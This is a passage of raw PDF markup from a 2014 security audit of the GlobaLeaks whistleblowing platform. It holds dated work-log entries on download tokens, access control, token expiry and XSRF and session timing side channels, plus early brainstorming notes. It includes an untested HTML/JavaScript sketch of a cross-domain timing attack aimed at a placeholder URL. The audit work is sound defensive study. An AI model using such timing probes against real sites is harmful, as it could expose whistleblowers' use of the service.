/F4 10 Tf (before ) Tj /F1 10 Tf (the WB is allowed to upload any files.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 468.7441 cm Q q 1 0 0 1 62.69291 311.5441 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 142.2 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 130.2 cm q BT 1 0 0 1 0 14 Tm 9.90372 Tw 12 TL /F1 10 Tf 0 0 0 rg (Investigated access to file downloads. ) Tj /F3 10 Tf (rest/api.py ) Tj /F1 10 Tf (binds ) Tj /F3 10 Tf (files.Download ) Tj /F1 10 Tf (to) Tj T* 0 Tw /F3 10 Tf (r'/rtip/') Tj ( ) Tj (+) Tj ( ) Tj (uuid_regexp) Tj ( ) Tj (+) Tj ( ) Tj ('/download/') Tj ( ) Tj (+ uuid_regexp) Tj /F1 10 Tf (. 
) Tj /F3 10 Tf (Download ) Tj /F1 10 Tf (has) Tj T* ET Q Q q 1 0 0 1 23 124.2 cm Q q 1 0 0 1 23 87 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 0 2 Tm T* ET q 1 0 0 1 20 0 cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 425.6898 36 re B* Q q BT 1 0 0 1 0 14 Tm 12 TL /F6 10 Tf 0 .501961 0 rg (def) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 0 1 rg (get) Tj 0 0 0 rg (\() Tj 0 .501961 0 rg (self) Tj 0 0 0 rg (,) Tj ( ) Tj (tip_id) Tj (,) Tj ( ) Tj (rfile_token) Tj (,) Tj ( ) Tj .4 .4 .4 rg (*) Tj 0 0 0 rg (uriargs) Tj (\):) Tj T* ( ) Tj /F7 10 Tf .25098 .501961 .501961 rg (# tip_id needed to authorized the download) Tj T* ET Q Q Q Q Q q Q Q q 1 0 0 1 23 87 cm Q q 1 0 0 1 23 45 cm q BT 1 0 0 1 0 26 Tm 1.937318 Tw 12 TL /F1 10 Tf 0 0 0 rg (but tip_id is never checked: it apparently only has to match ) Tj /F3 10 Tf (uuid_regexp) Tj /F1 10 Tf (. This would mean a) Tj T* 0 Tw 2.03498 Tw (downloader needs only an ) Tj /F3 10 Tf (rfile_token) Tj /F1 10 Tf (. This token is generated by ) Tj /F3 10 Tf (uuid.uuid4\(\) ) Tj /F1 10 Tf (in class) Tj T* 0 Tw /F3 10 Tf (FileToken ) Tj /F1 10 Tf (in ) Tj /F3 10 Tf (globaleaks/handlers/base.py) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 23 27 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (This may call a secure RNG or fall back to an insecure one.) Tj T* ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .221654 Tw 12 TL /F1 10 Tf 0 0 0 rg (\(This is issue K.\) Can that fallback happen? This question applies to all kinds of id's, since they're by) Tj T* 0 Tw (default generated by ) Tj /F3 10 Tf (uuid ) Tj /F1 10 Tf (in ) Tj /F3 10 Tf (models.py ) Tj /F1 10 Tf (line 25.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 311.5441 cm Q q 1 0 0 1 62.69291 281.5441 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (2014-02-06) Tj T* ET Q Q q 1 0 0 1 62.69291 269.5441 cm Q q 1 0 0 1 62.69291 269.5441 cm Q q 1 0 0 1 62.69291 221.5441 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 33 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 38 Tm 2.569213 Tw 12 TL /F1 10 Tf 0 0 0 rg (The file hash/copy loop in ) Tj /F3 10 Tf (dump_file_fs\(\) ) Tj /F1 10 Tf (in ) Tj /F3 10 Tf (files.py ) Tj /F1 10 Tf (doesn't seem like it's doing error) Tj T* 0 Tw .454597 Tw (checking right. \(Correction: the error checking is OK provided there's graceful exception handling by) Tj T* 0 Tw 1.335251 Tw (the caller. We did not check this.\) It looks like it's reading the whole file when a comment says it) Tj T* 0 Tw (should be reading 4kb.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 215.5441 cm Q q 1 0 0 1 62.69291 167.5441 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 33 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 38 Tm 1.529985 Tw 12 TL /F1 10 Tf 0 0 0 rg (Check for Issue F: does an expiration for a collection or download token, if interrupted by server) Tj T* 0 Tw .199983 Tw (restart, leave the token unexpired and accessible? Code inspection: yes, looks like it. Correction: no,) Tj T* 0 Tw 1.112927 Tw (both the expires ) Tj /F4 10 Tf (and ) Tj /F1 10 Tf (the tokens are in RAM. Trying it: a collection token does work before expiry,) Tj T* 0 Tw (does not after expiry, and does not after server restart.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 161.5441 cm Q q 1 0 0 1 7.137795 125.5441 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm 23.841 Tw 12 TL /F1 10 Tf 0 0 0 rg (Noticed Chrome complaining in JS console upon loading the main page:) Tj T* 0 Tw 15.33333 Tw /F3 10 Tf (Resource) Tj ( ) Tj (interpreted) Tj ( ) Tj (as) Tj ( ) Tj (Font) Tj ( ) Tj (but) Tj ( ) Tj (transferred) Tj ( ) Tj (with) Tj ( ) Tj (MIME) Tj ( ) Tj (type text/html:) Tj T* 0 Tw ("http://192.168.0.41:8082/components/bootstrap/dist/fonts/glyphicons-halflings-regular.woff".) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 119.5441 cm Q q 1 0 0 1 62.69291 95.54408 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .712765 Tw (Noticed usability issue: when sending mail fails, all I see is a message in the console log. \(But well) Tj T* 0 Tw (after writing this, mail did show up.\)) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 89.54408 cm Q endstream endobj % 'R383': class PDFStream 383 0 obj % page stream << /Length 8480 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 717.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 33 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 38 Tm .931318 Tw 12 TL /F1 10 Tf 0 0 0 rg (\(Now Issue F.\) What kind of access control exists to distinguish receivers? What stops Receiver A) Tj T* 0 Tw 1.070514 Tw (from being able to access the Tips only Receiver B should see? I've seen it check that the ) Tj /F4 10 Tf (role ) Tj /F1 10 Tf (is) Tj T* 0 Tw .37686 Tw ("receiver", but I haven't seen where it checks ) Tj /F4 10 Tf (which receiver should have access to what) Tj /F1 10 Tf (. 
The same) Tj T* 0 Tw (goes for whistleblowers.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 711.0236 cm Q q 1 0 0 1 62.69291 675.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm 1.965318 Tw 12 TL /F1 10 Tf 0 0 0 rg (The authors are worried about Denial of Service \(DoS\). Could the hash table DoS attack affect) Tj T* 0 Tw 1.069979 Tw /F4 10 Tf (GlobaLeaks) Tj /F1 10 Tf (? More info here: ) Tj 0 0 .501961 rg (http://bugs.python.org/issue13703 ) Tj 0 0 0 rg (Seems to be "fixed" in python, but) Tj T* 0 Tw (maybe you have to explicitly ask for the protection?) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 669.0236 cm Q q 1 0 0 1 62.69291 645.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .903314 Tw 12 TL /F1 10 Tf 0 0 0 rg (First noticed ) Tj /F3 10 Tf (app/.htaccess ) Tj /F1 10 Tf (in GLClient. What's it for? \(The ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (developers have since) Tj T* 0 Tw (removed it.\)) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 639.0236 cm Q q 1 0 0 1 62.69291 627.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Noticed ) Tj /F3 10 Tf (services.js ) Tj /F1 10 Tf (line 143 defines an unused variable. \(Does JSHint tell you that?\)) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 621.0236 cm Q q 1 0 0 1 62.69291 465.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 141 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 146 Tm 3.190751 Tw 12 TL /F1 10 Tf 0 0 0 rg (Investigated attacks on clock skew between client and server. 
Besides using a server's time) Tj T* 0 Tw .111627 Tw (\() Tj /F3 10 Tf (int\(time.time\(\)\)) Tj ( ) Tj (-) Tj ( ) Tj (time.timezone) Tj ( ) Tj (+) Tj ( ) Tj (seconds ) Tj /F1 10 Tf (from ) Tj /F3 10 Tf (globaleaks/utils/utility.py) Tj /F1 10 Tf (\)) Tj T* 0 Tw .999069 Tw /F3 10 Tf (app/scripts/services.js ) Tj /F1 10 Tf (line 35 has its test backwards: the expiration action would normally) Tj T* 0 Tw 1.028555 Tw (never occur unless the ) Tj /F3 10 Tf (new) Tj ( ) Tj (Date ) Tj /F1 10 Tf (when the callback is woken exactly equals the server-supplied) Tj T* 0 Tw 2.43561 Tw (time. Does it occur normally? In my testing there was accidental clock skew with the VM, the) Tj T* 0 Tw .483318 Tw (expiration timeout was a 41-bit negative number, and the callback was not called. \(In Chrome; even) Tj T* 0 Tw 1.485318 Tw (though with a small negative number a timeout callback is called immediately. I suspect the very) Tj T* 0 Tw .410514 Tw (large time difference gets truncated into its low-order 32 bits or so.\) Since I see no other case in the) Tj T* 0 Tw .246235 Tw (client of using times from the server, an attack would be limited to causing or suppressing client-side) Tj T* 0 Tw .72784 Tw (logout, or causing ) Tj /F3 10 Tf (setExpiration ) Tj /F1 10 Tf (to repeatedly run via ) Tj /F3 10 Tf (services.js ) Tj /F1 10 Tf (line 50 \(since the test to) Tj T* 0 Tw 2.026412 Tw (stop repetition has the wrong sense\). Client-side logout just presents an error and redirects the) Tj T* 0 Tw 1.351984 Tw (browser to ) Tj /F3 10 Tf (/login) Tj /F1 10 Tf (, except the code refers to a variable not defined in its scope, ) Tj /F3 10 Tf (source_path) Tj /F1 10 Tf (.) Tj T* 0 Tw (This looks like code that's never been run.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 465.0236 cm Q q 1 0 0 1 62.69291 435.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (2014-02-07) Tj T* ET Q Q q 1 0 0 1 62.69291 423.0236 cm Q q 1 0 0 1 62.69291 423.0236 cm Q q 1 0 0 1 62.69291 411.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Meeting with GlobaLeaks developers.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 411.0236 cm Q q 1 0 0 1 62.69291 381.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (2014-02-10) Tj T* ET Q Q q 1 0 0 1 62.69291 369.0236 cm Q q 1 0 0 1 62.69291 369.0236 cm Q q 1 0 0 1 62.69291 297.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 57 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 62 Tm 1.195814 Tw 12 TL /F1 10 Tf 0 0 0 rg (\(Now in ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (.\) Investigated the XSRF cookie. This is in ) Tj /F3 10 Tf (globaleaks/handlers/base.py ) Tj /F1 10 Tf (in) Tj T* 0 Tw 1.090814 Tw /F3 10 Tf (check_xsrf_cookie\(\)) Tj /F1 10 Tf (. Does comparing the token with ) Tj /F3 10 Tf (!= ) Tj /F1 10 Tf (create a useful timing attack? Does) Tj T* 0 Tw 2.079213 Tw (the difference in response time between not having an ) Tj /F3 10 Tf (X-XSRF-TOKEN ) Tj /F1 10 Tf (and having one create) Tj T* 0 Tw .592651 Tw (enough timing difference for another domain to tell if the user has visited the GlobaLeaks instance?) Tj T* 0 Tw .470814 Tw (Where does the XSRF token actually get set? Where is ) Tj /F3 10 Tf (check_xsrf_cookie\(\) ) Tj /F1 10 Tf (called? 
\(Answer:) Tj T* 0 Tw (it appears to be called ) Tj 0 0 .501961 rg (by Cyclone) Tj 0 0 0 rg (, not by any ) Tj /F4 10 Tf (GLBackend ) Tj /F1 10 Tf (code.\)) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 291.0236 cm Q q 1 0 0 1 62.69291 255.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm .211163 Tw 12 TL /F1 10 Tf 0 0 0 rg (Investigated the sessions. The sessions are stored in a ) Tj /F3 10 Tf (dict\(\) ) Tj /F1 10 Tf (with the session ID as the key. The) Tj T* 0 Tw 2.956235 Tw (browser sends the session ID in the ) Tj /F3 10 Tf (X-Session ) Tj /F1 10 Tf (header. \(Now in ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (:\) Can you use a) Tj T* 0 Tw (side-channel attack to get a session ID?) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 255.0236 cm Q q 1 0 0 1 62.69291 225.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (2014-02-11) Tj T* ET Q Q q 1 0 0 1 62.69291 213.0236 cm Q q 1 0 0 1 62.69291 213.0236 cm Q q 1 0 0 1 62.69291 201.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Confirmed issue E by scripting parallel logins.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 201.0236 cm Q q 1 0 0 1 62.69291 171.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (2014-02-12) Tj T* ET Q Q q 1 0 0 1 62.69291 141.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (2014-02-13) Tj T* ET Q Q q 1 0 0 1 62.69291 129.0236 cm Q q 1 0 0 1 62.69291 129.0236 cm Q q 1 0 0 1 62.69291 105.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 1.484651 Tw 12 TL /F1 10 Tf 0 0 0 rg (\(Now in ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (.\) Is the receiver login page vulnerable to user existence checking through timing) Tj T* 0 Tw (attacks as described in ) Tj 0 0 .501961 rg (EPITWA) Tj 0 0 0 rg (?) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 99.02362 cm Q endstream endobj % 'R384': class PDFStream 384 0 obj % page stream << /Length 4532 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 603.8236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 146.2 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 110.2 cm q BT 1 0 0 1 0 38 Tm .465542 Tw 12 TL /F1 10 Tf 0 0 0 rg (\(Now in ) Tj /F4 10 Tf (Issue J) Tj /F1 10 Tf (.\) Could a cross-domain timing attack be used to learn whether the user is logged in) Tj T* 0 Tw .24561 Tw (\(or has visited\) a ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (website or not? This might be ) Tj /F4 10 Tf (made possible by ) Tj /F1 10 Tf (the CSRF protection) Tj T* 0 Tw .675697 Tw (mechanism, since different code paths are executed depending on whether the CSRF cookie is set) Tj T* 0 Tw (or not. Some existing research has been done on this in ) Tj 0 0 .501961 rg (EPITWA) Tj 0 0 0 rg (.) 
Tj T* ET Q Q q 1 0 0 1 23 92.2 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Here's a brainstorm attempt, which I haven't tested yet \(may not use APIs correctly\):) Tj T* ET Q Q q 1 0 0 1 23 35 cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 445.6898 48 re B* Q q BT 1 0 0 1 0 26 Tm 12 TL /F6 10 Tf 0 .501961 0 rg (<) Tj (script) Tj (>) Tj (var) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (start) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj /F6 10 Tf 0 .501961 0 rg (new) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 .501961 0 rg (Date) Tj 0 0 0 rg (\() Tj (\);) Tj /F6 10 Tf 0 .501961 0 rg (<) Tj (/script) Tj (>) Tj /F3 10 Tf 0 0 0 rg T* /F6 10 Tf 0 .501961 0 rg (<) Tj (img) Tj /F3 10 Tf 0 0 0 rg ( ) Tj .490196 .564706 .160784 rg (src=) Tj .729412 .129412 .129412 rg ("${TARGET_CSRF_URL") Tj /F6 10 Tf 0 .501961 0 rg (>) Tj (<) Tj (/img) Tj (>) Tj /F3 10 Tf 0 0 0 rg T* /F6 10 Tf 0 .501961 0 rg (<) Tj (script) Tj (>) Tj /F3 10 Tf 0 0 0 rg ( ) Tj /F6 10 Tf 0 .501961 0 rg (var) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (end) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj /F6 10 Tf 0 .501961 0 rg (new) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 .501961 0 rg (Date) Tj 0 0 0 rg (\() Tj (\);) Tj ( ) Tj (console) Tj (.) Tj (log) Tj (\() Tj (end) Tj ( ) Tj .4 .4 .4 rg (-) Tj 0 0 0 rg ( ) Tj (start) Tj (\);) Tj ( ) Tj /F6 10 Tf 0 .501961 0 rg (<) Tj (/script) Tj (>) Tj T* ET Q Q Q Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .888221 Tw 12 TL /F1 10 Tf 0 0 0 rg (In the paper, they use the ) Tj /F3 10 Tf (onerror ) Tj /F1 10 Tf (property of the image. The paper also notes that it's possible) Tj T* 0 Tw (even without JavaScript, using the ) Tj /F3 10 Tf (SCRIPT ) Tj /F1 10 Tf (and ) Tj /F3 10 Tf (LINK ) Tj /F1 10 Tf (tags.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 603.8236 cm Q q 1 0 0 1 62.69291 573.8236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (2014-02-14) Tj T* ET Q Q q 1 0 0 1 62.69291 561.8236 cm Q q 1 0 0 1 62.69291 561.8236 cm Q q 1 0 0 1 62.69291 549.8236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Verified that file downloads also face Issue F.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 549.8236 cm Q q 1 0 0 1 62.69291 519.8236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (2014-02-17) Tj T* ET Q Q q 1 0 0 1 62.69291 489.8236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (2014-02-18) Tj T* ET Q Q q 1 0 0 1 62.69291 477.8236 cm Q q 1 0 0 1 62.69291 477.8236 cm Q q 1 0 0 1 62.69291 465.8236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Split Issues J and K out of Issue F.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 465.8236 cm Q q 1 0 0 1 62.69291 435.8236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (2014-02-19) Tj T* ET Q Q q 1 0 0 1 62.69291 423.8236 cm Q q 1 0 0 1 62.69291 423.8236 cm Q q 1 0 0 1 62.69291 411.8236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Timing attack proof of concept.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 411.8236 cm Q q 1 0 0 1 62.69291 381.8236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (2014-02-20) Tj T* ET Q Q q 1 0 0 1 62.69291 375.8236 cm Q endstream endobj % 'R385': class PDFStream 385 0 obj % page stream << /Length 9137 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 744.0236 cm q BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Appendix B. 
Brainstorming Notes) Tj T* ET Q Q q 1 0 0 1 62.69291 702.0236 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .569398 Tw (This section contains brainstorming notes that were created in the very early stages of the audit, most of) Tj T* 0 Tw .49936 Tw (them before we began looking at the code. This section hypothesizes vulnerabilities that we did not have) Tj T* 0 Tw (time to consider.) Tj T* ET Q Q q 1 0 0 1 62.69291 672.0236 cm q BT 1 0 0 1 0 14 Tm .844488 Tw 12 TL /F1 10 Tf 0 0 0 rg (This section is quite rough, and it also overlaps with our ) Tj 0 0 .501961 rg (Appendix A. Work Log) Tj 0 0 0 rg (, due to a change in our) Tj T* 0 Tw (process during this audit.) Tj T* ET Q Q q 1 0 0 1 62.69291 666.0236 cm Q q 1 0 0 1 62.69291 666.0236 cm Q q 1 0 0 1 62.69291 654.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Whistleblowers trying "legitimate" channels first will de-anonymize them. Probably out of scope?) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 648.0236 cm Q q 1 0 0 1 62.69291 624.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 1.113555 Tw 12 TL /F1 10 Tf 0 0 0 rg (Use case: Repeated whistleblowing, e.g. user is still employed and wants to continue leaking new) Tj T* 0 Tw (documents as long as possible. Is ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (secure in this model?) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 618.0236 cm Q q 1 0 0 1 62.69291 582.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm .161412 Tw 12 TL /F1 10 Tf 0 0 0 rg (Important to remember: WB needs to remain ) Tj /F4 10 Tf (anonymous) Tj /F1 10 Tf (, even assuming the Node is the adversary.) Tj T* 0 Tw .332651 Tw (By the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (threat model, the submitted data is ) Tj /F4 10 Tf (not ) Tj /F1 10 Tf (expected to remain confidential when the) Tj T* 0 Tw (Node is the adversary.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 576.0236 cm Q q 1 0 0 1 62.69291 540.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.715366 Tw (We should assume receivers are mutually adversarial. For example, each receiver might be one) Tj T* 0 Tw .038651 Tw (independent journalism organization, and they will compete with each other to get access to \(or DoS\)) Tj T* 0 Tw (each others' Tips.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 534.0236 cm Q q 1 0 0 1 62.69291 522.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (DoS by uploading massive files?) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 516.0236 cm Q q 1 0 0 1 62.69291 462.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 39 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 27 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .526303 Tw (It uses a fixed per-Node salt to hash the receipts. 
